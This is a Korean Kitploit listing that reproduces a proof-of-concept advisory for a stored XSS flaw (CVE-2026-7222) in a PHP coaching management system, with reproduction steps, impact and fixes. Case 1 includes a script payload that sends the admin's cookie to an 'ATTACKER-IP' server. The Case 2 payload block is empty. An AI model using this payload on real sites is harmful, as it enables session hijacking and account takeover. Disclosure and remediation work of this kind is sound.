Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-7222-XSS — PHP 기반 코칭 관리 시스템에서 저장형 XSS (CWE-79)에 대한 개념 증명 익스플로잇으로, 쿠키 탈취를 통해 학생에서 관리자로의 세션 하이재킹 및 권한 상승을 보여줍니다. | Kitploit
도구/GitHubGitHub/xmyronn/cve-2026-7222-xss
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubxmyronn/cve-2026-7222-xss

CVE-2026-7222-XSS

PHP 기반 코칭 관리 시스템에서 저장형 XSS (CWE-79)에 대한 개념 증명 익스플로잇으로, 쿠키 탈취를 통해 학생에서 관리자로의 세션 하이재킹 및 권한 상승을 보여줍니다.

저장소 보기
44개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

저장형 크로스 사이트 스크립팅 (XSS) 취약점으로 인한 코칭 관리 시스템 계정 탈취


제품

PHP 기반 코칭 관리 시스템 (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/


영향받는 구성 요소

  • /modules/student/complaint.php (불만 제출)
  • /modules/admin/incomingcomplaint.php (불만 조회)
  • 불만 답변 기능 (관리자/교사 → 학생)

버전

알 수 없음 (공급업체에서 버전 정보를 제공하지 않음; 2026년 4월 기준 Code-Projects.org의 최신 버전에서 테스트)


취약점 유형

CWE-79: 웹 페이지 생성 중 입력 처리 부적절 (저장형 크로스 사이트 스크립팅)


설명

애플리케이션이 불만 및 답변 기능에서 사용자 제공 입력을 적절히 살균(sanitize)하지 않습니다. 낮은 권한의 사용자가 주입한 악성 JavaScript가 저장되고, 관리자나 교사와 같은 높은 권한의 사용자가 볼 때 실행됩니다.

또한 답변 기능도 취약하여, 관리자나 교사가 학생 세션에서 실행되는 JavaScript를 주입할 수 있습니다.

이로 인해 여러 사용자 역할에 영향을 미치는 저장형 XSS 취약점이 발생합니다.


재현 단계

사례 1: 학생 → 관리자 (권한 상승)

  1. 학생으로 로그인

  2. 다음으로 이동: /modules/student/complaint.php Screenshot 2026-04-10 212940

  3. 다음 페이로드로 불만을 제출합니다:

root@kitploit:~
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
Screenshot 2026-04-10 213341
  1. 관리자로 로그인

  2. 다음으로 이동: /modules/admin/incomingcomplaint.php Screenshot 2026-04-10 212951

  3. 관리자가 불만을 열람하면 페이로드가 자동으로 실행됩니다

  4. 관리자 세션 쿠키가 공격자 제어 서버로 전송됩니다

  5. 탈취한 세션 쿠키를 사용하여 관리자 세션을 가로챕니다 Screenshot 2026-04-10 213350

    Screenshot 2026-04-10 213406

사례 2: 관리자 → 학생 (역방향 XSS)

  1. 관리자로 로그인
  2. 다음 페이로드로 불만에 답변합니다:
root@kitploit:~
  1. 학생으로 로그인
  2. 불만 답변을 확인합니다

개념 증명 증거

  • 악성 불만 열람 시 관리자 패널에서 JavaScript 실행 확인
  • 세션 쿠키(PHPSESSID)가 공격자 제어 서버를 통해 성공적으로 유출됨
  • 탈취한 쿠키로 관리자 세션 가로채기 성공
  • 답변 기능을 통해 학생 패널에서 JavaScript 실행 확인

영향

  • 낮은 권한의 사용자(학생)가 관리자 컨텍스트에서 임의의 JavaScript를 실행할 수 있음
  • HttpOnly 플래그 부재로 인해 세션 하이재킹 발생
  • 전체 관리자 계정 탈취
  • 양방향 XSS로 여러 역할(관리자, 교사, 학생) 손상 가능
  • 애플리케이션 무결성, 기밀성 및 가용성의 완전한 손상

심각도: 치명적(Critical)


근본 원인

  • 입력 검증 부재
  • 출력 인코딩 미적용
  • 세션 쿠키에 보안 제어 누락 (HttpOnly 플래그 미설정)

권장 사항

  • 모든 사용자 입력을 정화하고 검증하십시오.
  • PHP의 htmlspecialchars()와 같은 함수를 사용하여 출력을 인코딩하십시오.
  • 세션 쿠키에 HttpOnly 및 Secure 플래그를 설정하십시오.
  • 콘텐츠 보안 정책(CSP)을 구현하십시오.

도구 다운로드